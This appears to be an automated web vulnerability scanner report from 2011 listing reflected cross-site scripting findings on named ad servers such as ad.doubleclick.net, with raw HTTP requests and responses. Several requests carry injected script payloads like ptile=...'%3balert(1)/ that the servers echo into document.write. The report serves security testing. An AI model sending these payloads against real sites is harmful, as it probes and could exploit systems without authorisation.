GET /adj/cm.mtv/ent_010111;sz Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://viacom.adbureau User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 453 Vary: Accept-Encoding Date: Mon, 13 Jun 2011 11:23:29 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.mtv/ent_010111 |
GET /adj/cm.mtv/ent_010111;sz Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://viacom.adbureau User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 450 Vary: Accept-Encoding Date: Mon, 13 Jun 2011 11:23:29 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2436.150781.B3 |
GET /adi/N2436.150781.B3 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7019 Cache-Control: no-cache Pragma: no-cache Date: Mon, 13 Jun 2011 12:17:46 GMT Expires: Mon, 13 Jun 2011 12:17:46 GMT <html><head><title ...[SNIP]... gEJNzI4eDkwX2FzyAEJ2 var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowsc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2436.150781.B3 |
GET /adi/N2436.150781.B3 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7061 Date: Mon, 13 Jun 2011 12:17:15 GMT <html><head><title ...[SNIP]... v7qTXH3I3nWNCgngIQAR var fs ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2436.150781.B3 |
GET /adi/N2436.150781.B3 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7061 Date: Mon, 13 Jun 2011 12:17:44 GMT <html><head><title ...[SNIP]... UuY29tugEJNzI4eDkwX2 var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2436.150781.B3 |
GET /adi/N2436.150781.B3 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7061 Date: Mon, 13 Jun 2011 12:17:25 GMT <html><head><title ...[SNIP]... 3I3nWNCgngIQARgBIJCo var fscUrl = ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2436.150781.B3 |
GET /adi/N2436.150781.B3 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7061 Date: Mon, 13 Jun 2011 12:17:34 GMT <html><head><title ...[SNIP]... BYMnW8obIo_wasgEPd3d var fscUrl = url; var fscUrlClickTagFound = false; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2436.150781.B3 |
GET /adi/N2436.150781.B3 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7061 Date: Mon, 13 Jun 2011 12:17:05 GMT <html><head><title ...[SNIP]... url = escape("http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2436.150781.B3 |
GET /adi/N2436.150781.B3 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7048 Cache-Control: no-cache Pragma: no-cache Date: Mon, 13 Jun 2011 11:31:47 GMT Expires: Mon, 13 Jun 2011 11:31:47 GMT <html><head><title ...[SNIP]... AweDI1MF9hc8gBCdoBIG var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowsc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2436.150781.B3 |
GET /adi/N2436.150781.B3 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7090 Date: Mon, 13 Jun 2011 11:31:16 GMT <html><head><title ...[SNIP]... H3I3nWICD-QEQARgBIJC var fs ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2436.150781.B3 |
GET /adi/N2436.150781.B3 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7090 Date: Mon, 13 Jun 2011 11:31:45 GMT <html><head><title ...[SNIP]... tugEKMzAweDI1MF9hc8g var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2436.150781.B3 |
GET /adi/N2436.150781.B3 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7090 Date: Mon, 13 Jun 2011 11:31:26 GMT <html><head><title ...[SNIP]... ICD-QEQARgBIJConBM4A var fscUrl = ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2436.150781.B3 |
GET /adi/N2436.150781.B3 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7090 Date: Mon, 13 Jun 2011 11:31:35 GMT <html><head><title ...[SNIP]... 8obIo_wasgEPd3d3LnR3 var fscUrl = url; var fscUrlClickTagFound = false; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2436.150781.B3 |
GET /adi/N2436.150781.B3 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7090 Date: Mon, 13 Jun 2011 11:31:06 GMT <html><head><title ...[SNIP]... rl = escape("http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.rtb/fingerhut |
GET /adi/x1.rtb/fingerhut Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidnw.ru4.com/nf? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4886 Date: Mon, 13 Jun 2011 11:03:07 GMT <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 10hairy_728x90.jpg'; var dccreativewidth = '728'; var dcwmode = 'opaque'; var imgurl = 'http://bidnw.ru4.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.rtb/fingerhut |
GET /adi/x1.rtb/fingerhut Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidnw.ru4.com/nf? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4869 Date: Mon, 13 Jun 2011 11:03:26 GMT <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... g'; var dccreativewidth = '728'; var dcwmode = 'opaque'; var imgurl = 'http://bidnw.ru4.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.rtb/fingerhut |
GET /adi/x1.rtb/fingerhut Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidnw.ru4.com/nf? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4869 Date: Mon, 13 Jun 2011 11:02:46 GMT <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... p://s0.2mdn.net/1887566 var dccreativewidth = '728'; var dcwmode = 'opaque'; var imgurl = 'http://bidnw.ru4.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.rtb/fingerhut |
GET /adi/x1.rtb/fingerhut Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidnw.ru4.com/nf? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4896 Date: Mon, 13 Jun 2011 11:02:57 GMT <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... .net/1887566/frugal var dccreativewidth = '728'; var dcwmode = 'opaque'; var imgurl = 'http://bidnw.ru4.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.rtb/fingerhut |
GET /adi/x1.rtb/fingerhut Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidnw.ru4.com/nf? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4872 Date: Mon, 13 Jun 2011 11:02:36 GMT <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... gif = 'http://s0.2mdn.net var dccreativewidth = '728'; var dcwmode = 'opaque'; var imgurl = 'http://bidnw.ru4.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.rtb/fingerhut |
GET /adi/x1.rtb/fingerhut Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidnw.ru4.com/nf? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4847 Date: Mon, 13 Jun 2011 11:03:36 GMT <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... creativewidth = '728'; var dcwmode = 'opaque'; var imgurl = 'http://bidnw.ru4.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.rtb/fingerhut |
GET /adi/x1.rtb/fingerhut Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidnw.ru4.com/nf? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4886 Date: Mon, 13 Jun 2011 11:03:45 GMT <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... = '728'; var dcwmode = 'opaque'; var imgurl = 'http://bidnw.ru4.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.rtb/fingerhut |
GET /adi/x1.rtb/fingerhut Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidnw.ru4.com/nf? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4896 Date: Mon, 13 Jun 2011 11:03:16 GMT <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... al_728x90.jpg'; var dccreativewidth = '728'; var dcwmode = 'opaque'; var imgurl = 'http://bidnw.ru4.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.rtb/fingerhut |
GET /adi/x1.rtb/fingerhut Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidnw.ru4.com/nf? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4675 Cache-Control: no-cache Pragma: no-cache Date: Mon, 13 Jun 2011 11:03:47 GMT Expires: Mon, 13 Jun 2011 11:03:47 GMT <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... var dcwmode = 'opaque'; var imgurl = 'http://bidnw.ru4.com var target = '_blank'; var dc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.rtb/fingerhut |
GET /adi/x1.rtb/fingerhut Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidnw.ru4.com/nf? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4847 Date: Mon, 13 Jun 2011 11:02:24 GMT <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ''; var dcgif = 'http://s0.2mdn.net var dccreativewidth = '728'; var dcwmode = 'opaque'; var imgurl = 'http://bidnw.ru4.com ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://ad.doubleclick.net |
Path: | /adj/cm.mtv/ent_010111 |
GET /adj/cm.mtv/ent_010111 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://viacom.adbureau User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 339 Cache-Control: no-cache Pragma: no-cache Date: Mon, 13 Jun 2011 11:24:12 GMT Expires: Mon, 13 Jun 2011 11:24:12 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/gm.kotaku/e3 |
GET /adj/gm.kotaku/e3;ptile=1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://kotaku.com/5811225 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 403 Date: Mon, 13 Jun 2011 11:23:26 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/gm.kotaku/e3 |
GET /adj/gm.kotaku/e3;ptile=7570e'%3balert(1)/ Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://kotaku.com/5811225 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 351 Cache-Control: no-cache Pragma: no-cache Date: Mon, 13 Jun 2011 11:23:24 GMT Expires: Mon, 13 Jun 2011 11:23:24 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/gm.kotaku/pax |
GET /adj/gm.kotaku/pax;ptile Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://kotaku.com/5811225 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 353 Date: Mon, 13 Jun 2011 11:23:42 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/gm.kotaku/pax |
GET /adj/gm.kotaku/pax;ptile=ccf35'%3balert(1)/ Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://kotaku.com/5811225 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 301 Cache-Control: no-cache Pragma: no-cache Date: Mon, 13 Jun 2011 11:23:39 GMT Expires: Mon, 13 Jun 2011 11:23:39 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/gm.kotaku/pc |
GET /adj/gm.kotaku/pc;ptile=9 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://kotaku.com/static User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 371 Date: Mon, 13 Jun 2011 11:23:55 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/gm.kotaku/pc |
GET /adj/gm.kotaku/pc;ptile=5b7dc'%3balert(1)/ Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://kotaku.com/static User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 301 Cache-Control: no-cache Pragma: no-cache Date: Mon, 13 Jun 2011 11:23:50 GMT Expires: Mon, 13 Jun 2011 11:23:50 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/oiq.rmx/ |
GET /adj/oiq.rmx/;click0=45bf9'-alert(1)- Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 360 Cache-Control: no-cache Pragma: no-cache Date: Mon, 13 Jun 2011 11:20:12 GMT Expires: Mon, 13 Jun 2011 11:20:12 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/pixel.htm |
